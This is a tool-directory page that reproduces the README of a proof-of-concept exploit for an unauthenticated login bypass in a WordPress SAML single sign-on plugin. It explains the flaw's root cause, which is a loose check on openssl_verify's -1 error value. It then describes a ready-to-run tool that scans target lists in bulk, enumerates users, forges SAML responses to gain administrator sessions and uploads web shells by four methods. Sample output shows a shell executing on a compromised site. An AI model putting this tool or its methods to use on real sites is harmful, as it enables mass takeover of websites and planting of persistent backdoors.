Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-15981 — SAML Single Sign On <= 5.4.4 - Unauthenticated Authentication Bypass via SAMLResponse Parameter | Kitploit
Tools/GitHubGitHub/nxploited/cve-2026-15981
Authentication & AuthorizationPayload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPost-ExploitationPenetration Testing
GitHubnxploited/cve-2026-15981

CVE-2026-15981

SAML Single Sign On <= 5.4.4 - Unauthenticated Authentication Bypass via SAMLResponse Parameter

View Repository
152 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-15981

SAML Single Sign On <= 5.4.4 - Unauthenticated Authentication Bypass via SAMLResponse Parameter

CVE CVSS CWE CWE Python

CVE-2026-15981

SAML Single Sign On ≤ 5.4.4 — Unauthenticated Authentication Bypass

Proof-of-Concept Exploit
Malformed Signature → openssl_verify() returns -1 → PHP loose cast to true → wp_set_auth_cookie() as Administrator


Vulnerability Overview

FieldDetail
CVE IDCVE-2026-15981
Affected PluginminiOrange SAML 2.0 Single Sign On – SSO Login (WordPress)
Affected VersionsAll versions up to and including 5.4.4
TypeUnauthenticated Authentication Bypass
CWECWE-287: Improper Authentication / CWE-305: Authentication Bypass by Primary Weakness
CVSS 3.19.8 CRITICAL — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AuthenticationNone required

Description

The SAML Single Sign On – SSO Login plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 5.4.4. This is due to the mo_saml_validate_signature() function performing a loose boolean check on the raw tri-state integer returned by PHP's openssl_verify(), causing an error return value of -1 to be evaluated as truthy and therefore treated as a successful signature verification.

This makes it possible for unauthenticated attackers to log in as any existing WordPress user, including administrators, by submitting a crafted SAMLResponse containing an attacker-controlled NameID and a deliberately malformed signature value that triggers an OpenSSL processing error — bypassing verification entirely and resulting in wp_set_auth_cookie() being called for the targeted account.

Root Cause

Attacker sends crafted SAMLResponse
         │
         ▼
mo_saml_validate_signature()
         │
         ▼
openssl_verify($data, $malformed_sig, $key)
         │
         ├─ Returns  1  → valid signature      ✓
         ├─ Returns  0  → invalid signature     ✗
         └─ Returns -1  → OpenSSL internal error
                │
                ▼
     PHP loose comparison:  if ($result)
                │
                ├─ (int) 1   → true   ✓
                ├─ (int) 0   → false  ✓
                └─ (int) -1  → true   ← BUG: error treated as success
                       │
                       ▼
             wp_set_auth_cookie() called
                       │
                       ▼
             Attacker is now Administrator

The fix is trivial — if ($result === 1) instead of if ($result) — but the impact of the flaw is total authentication bypass.


Features

  • Multi-target mass scanning — concurrent processing of target lists
  • Full WordPress fingerprinting — confirms WordPress before proceeding
  • Plugin detection & version check — identifies miniOrange SAML SSO and validates version ≤ 5.4.4
  • SP metadata discovery — extracts Entity ID and ACS URL from ?option=mosaml_metadata
  • Comprehensive user enumeration:
    • WP REST API (/wp-json/wp/v2/users)
    • Per-ID REST queries (IDs 1–10)
    • Author archive redirects (/?author=N)
    • HTML body pattern matching
    • Domain-based fallback + common admin names
  • IdP issuer discovery — follows ?option=saml_user_login redirects and extracts IdP base URLs
  • SAMLResponse forgery engine:
    • Proper Exclusive C14N canonicalization via lxml
    • Correct Digest computation (SHA-1/SHA-256/SHA-384/SHA-512)
    • Signature element injection after </Issuer> per SAML spec
    • 12+ malformed signature payloads designed to trigger openssl_verify() = -1
    • Iterates users × issuers × algorithms × signatures × audience flags × SP entity IDs
  • Session verification — checks for wordpress_logged_in_* cookie after each attempt
  • Admin role confirmation — verifies access to /wp-admin/, /wp-admin/users.php, /wp-admin/plugins.php
  • Profile extraction — reads username and email from /wp-admin/profile.php
  • 4 shell upload methods upon admin session:
    • M1 — Plugin ZIP upload via plugin-install.php
    • M2 — REST API plugin upload via /wp-json/wp/v2/plugins
    • M3 — Theme/Plugin editor file write
    • M4 — Media async upload
  • Shell execution verification — confirms Nx-zD signature in response body
  • Diagnostic engine — classifies failure reasons (DIGEST_FAIL, ISSUER, AUDIENCE, TIME, etc.)
  • Debug JSON output — full per-target diagnostic log for analysis

Requirements

Python >= 3.8
pip install requests lxml

lxml is required for proper Exclusive C14N canonicalization of the SAML Assertion.


Usage

python CVE-2026-15981.py

You will be prompted for:

PromptDescriptionDefault
Targets filePath to a text file with one target per linelist.txt
ThreadsNumber of concurrent workers (1–100)5

Target File Format

https://example.com
http://target.org
subdomain.example.net
192.168.1.100
https://example.com/wordpress

One URL per line. HTTP is used by default if no scheme is specified.


Output

Terminal

  ███████╗███╗   ███╗███████╗
  ██╔════╝████╗ ████║██╔════╝
  ███████╗██╔████╔██║███████╗
  ╚════██║██║╚██╔╝██║╚════██║
  ███████║██║ ╚═╝ ██║███████║
  ╚══════╝╚═╝     ╚═╝╚══════╝
   ╔══════════════════════════════════════════════════════════╗
   ║  miniOrange SAML SSO <= 5.4.4                           ║
   ║  openssl_verify() -1 Bypass -> Admin Session            ║
   ╚══════════════════════════════════════════════════════════╝
  By: Nxploited ( Khaled Alenazi ) - Nxploited ZeroDay Hub
  T.m @Kxploit

Each target progresses through 7 labeled stages:

  ============================================================
    target.com
  ============================================================
  [1] WordPress
      confirmed
  [2] SAML plugin
      version: 5.4.4
      miniOrange SAML detected
  [3] SP metadata
      metadata entityID: https://target.com/...
      metadata ACS: https://target.com/
  [4] Users
      REST: admin (id=1)
      REST: editor (id=2)
      author/3: johndoe
      4 found: ['admin', 'editor', 'johndoe', 'target']
  [5] Issuers
      SSO redirect found
      3 candidates
  [6] Exploit
      COOKIE! #14 user=admin 0xFF*256/rsa-sha256
        wordpress_logged_in_abc123=admin%7C1753...
        wp-admin accessible
          user=admin  [email protected]
          users.php -> Admin
  [7] Shell upload
      M1: plugin uploaded
      SHELL (M1-plugin): https://target.com/wp-content/plugins/nxproof/Nx.php
        -> Nx-zD Linux target 6.1.0 x86_64 uid=33(www-data) ...

  +==========================================================+
  |  ADMIN SESSION CONFIRMED                                 |
  +==========================================================+
  |  Target : https://target.com
  |  User   : admin
  |  Issuer : https://idp.example.com/simplesaml/...
  |  Method : 0xFF*256/rsa-sha256
  |  Cookie : wordpress_logged_in_abc123=admin%7C1753...
  |  Shell  : https://target.com/wp-content/plugins/nxproof/Nx.php
  +==========================================================+

Result Files

Download Tool